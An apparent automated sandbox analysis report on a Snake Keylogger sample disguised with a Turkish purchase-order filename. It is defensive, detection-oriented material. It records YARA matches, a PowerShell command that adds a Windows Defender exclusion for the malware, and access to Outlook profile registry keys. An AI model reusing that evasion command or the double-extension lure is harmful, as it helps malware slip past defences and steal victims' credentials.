                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 00000004.00000002.1310525073.0000000003402000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2546405644.0000000006D29000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe, 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeBinary or memory string: OriginalFilenamelwhS.exe< vs fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 4.2.fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.4457a18.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000B.00000002.2525424309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000004.00000002.1311397294.0000000004415000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 4692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe PID: 2020, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/6@3/3
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe.logJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_03
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\pOqZvVceyyXzOnsdg
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn0dnzl5.4hm.ps1Jump to behavior
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 68%
                  Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe"Jump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
